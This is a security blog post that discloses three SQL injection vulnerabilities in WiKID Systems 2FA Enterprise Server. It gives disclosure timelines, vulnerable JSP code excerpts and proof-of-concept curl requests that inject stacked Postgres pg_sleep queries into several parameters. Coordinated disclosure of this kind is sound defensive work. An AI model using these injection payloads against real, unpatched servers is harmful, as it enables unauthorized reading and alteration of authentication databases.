BLOG HOME > Cybersecurity > WiKID Systems 2FA Enterprise Server SQL injection

WiKID Systems 2FA Enterprise Server SQL injection

Author: Aaron Bishop

CVE-2019-16917


A SQL Injection vulnerability, CVE-2019-16917, was identified on WiKID Systems 2FA Enterprise Server through version 4.2.0-b2047. The uid and domain parameters, used by searchDevices.jsp, are not sanitized before being included in a SQL query thus allowing an authenticated user to create, read, update, or delete information in the database.

Patch

Timeline

  • 14 Sep 2019 - Issue discovered on WiKID Systems 2FA Enterprise Server 4.2.0-b2032 and disclosed to WiKID Systems.
  • 26 Sep 2019 - Issue confirmed by WiKID Systems, Patch Released
  • 16 Oct 2019 - Public Disclosure

Description

The source code for searchDevices.jsp reveals the buildSearchWhereClause. The uid and domain parameters are retrieved in the buildSearchWhereClause function:

191     private void buildSearchWhereClause(HttpServletRequest request) {
192         where = "";
193         String uid=request.getParameter("uid");
194         String domain=request.getParameter("domain");

domain parameter

If the domain parameter is set and uid parameter is not set, domain is included, in the query allowing SQL injection here:

203         }else if(!domain.equals("0") && uid==null){
204             where="where domainid="+domain;

If the uid parameter is set, the domain parameter is included, in the query allowing SQL injection here:

205         }else if(uid!=null){
...
214             if(!domain.equals("0")){
215                 where=where+" and domainid="+domain;
216             }
217         }
218     }

The backend database is Postgres which supports Stacked Queries.  A value such as 1; select pg_sleep(10);-- will cause the database and application will hang for 10+ seconds, the original query will execute followed a second query to sleep for 10 seconds:

SLEEP=10; HOST=$RHOST; COOKIE=$COOKIE; time curl -v -i -s -k  -X 'POST' -H "Host: $HOST" -H "Cookie: JSESSIONID=$COOKIE;" --data-binary "uid=test&domain=1;select pg_sleep($SLEEP);--&action=Search" https://$HOST/WiKIDAdmin/searchDevices.jsp

uid parameter

If the uid parameter is set, the logic drops down to following block where the uid parameter is included in the query:

205         }else if(uid!=null){
206             uid=uid.toLowerCase().trim();
207             String ask=uid.substring(uid.length()-1);
208             if(ask!=null ){
209 //                uid=uid.substring(0,uid.length()-1);
210                 where="where RTRIM(LOWER(userid)) like LOWER('%"+uid+"%')";
211 //            }else{
212 //                where="where RTRIM(LOWER(userid))=LOWER('"+uid+"')";
213             }

A request, such as the following, will trigger the issue, causing the application to delay for 10+ seconds:

SLEEP=10; HOST=$RHOST; COOKIE=$COOKIE; time curl -v -i -s -k  -X 'POST' -H "Host: $HOST" -H "Cookie: JSESSIONID=$COOKIE;" --data-binary "uid=1;select pg_sleep($SLEEP);--&action=Search" https://$HOST/WiKIDAdmin/searchDevices.jsp


CVE-2019-17117


A SQL Injection vulnerability, CVE-2019-17117, was identified on WiKID Systems 2FA Enterprise Server through version 4.2.0-b2053. The key parameter, used in processPref.jsp, is not sanitized before being included in a SQL query thus allowing an authenticated user to create, read, update, or delete arbitrary information in the database.

Patch

Timeline

  • 26 Sep 2019 - Issue discovered on WiKID Systems 2FA Enterprise Server 4.2.0-b2032
  • 29 Sep 2019 - Issue disclosed to WiKID Systems
  • 09 Oct 2019 - Issue confirmed by WiKID Systems, Patch released
  • 16 Oct 2019 - Public Disclosure

Description

The source code for processPref.jsp reveals the following code block:

121     } else if (request.getParameter("action").equals("Update")) {
122         // need to do error checking here.
123         sql = "SELECT key FROM parms1to1 where key='" + request.getParameter("key") + "'";
124         ResultSet result = stat.executeQuery(sql);
125         if (!result.next()) {
126     %>

If the action parameter is set to Update, the key parameter is included in a SQL query used to retrieve the Parameter that will be updated. The key parameter is not sanitized before it is included in the query. A request such as:

https://$RHOST/WiKIDAdmin/processPref.jsp?action=Update&key=test%27;%20SELECT%20pg_sleep(5);--

Will cause the application to delay for at least 5 seconds.


CVE-2019-17119


Multiple SQL Injection vulnerabilities, CVE-2019-17119, were identified on WiKID Systems 2FA Enterprise Server through version 4.2.0-b2053. The substring and source parameters, used by Logs.jsp, are not sanitized before being included in a SQL query thus allowing an authenticated user to create, read, update, or delete arbitrary information in the database.

Patch

Timeline

  • 26 Sep 2019 - Issue discovered on WiKID Systems 2FA Enterprise Server 4.2.0-b2032
  • 29 Sep 2019 - Issue disclosed to WiKID Systems
  • 09 Oct 2019 - Issue confirmed by WiKID Systems, Patch released
  • 16 Oct 2019 - Public Disclosure

Description

The source code for Logs.jsp reveals the following logic:

192     private String createSourceFilter(HttpServletRequest request) {
193         String source = getLogConfig(request).get("source");
194         if (source == null || "None".equals(source)) {
195             return " ";
196         }
197         return " and logger_name = '" + source + "' ";
198     }
199 
200     private String createSubStringFilter(HttpServletRequest request) {
201         String subString = getLogConfig(request).get("subString");
202         if (subString == null || subString.trim().length() == 0) {
203             return " ";
204         }
205         return " and rendered_message like '%" + subString + "%' ";
206     }

createSourceFilter reads the source parameter and includes the value in a query being constructed;createSubStringFilter reads the substring parameter and includes the value in a query that is being constructed.

The following queries can be used to demonstrate the parameters are vulnerable, the queries take advantage of Stacked Queries in Postgres; a secondary request is issued that causes the database and application to delay for 5+ seconds:

time curl --output /dev/null -s -k -H "Cookie: JSESSIONID=$COOKIE" --data-binary "source='; select pg_sleep(5);--" https://$RHOST/WiKIDAdmin/Log.jsp

real    0m10.572s
user    0m0.008s
sys     0m0.016s
time curl --output /dev/null -s -k -H "Cookie: JSESSIONID=$COOKIE" --data-binary "subString='; select pg_sleep(5);--" https://$RHOST/WiKIDAdmin/Log.jsp

real    0m10.572s
user    0m0.008s
sys     0m0.016s

We are excited to work with you.

*Required

Thank you!

Your request has been submitted.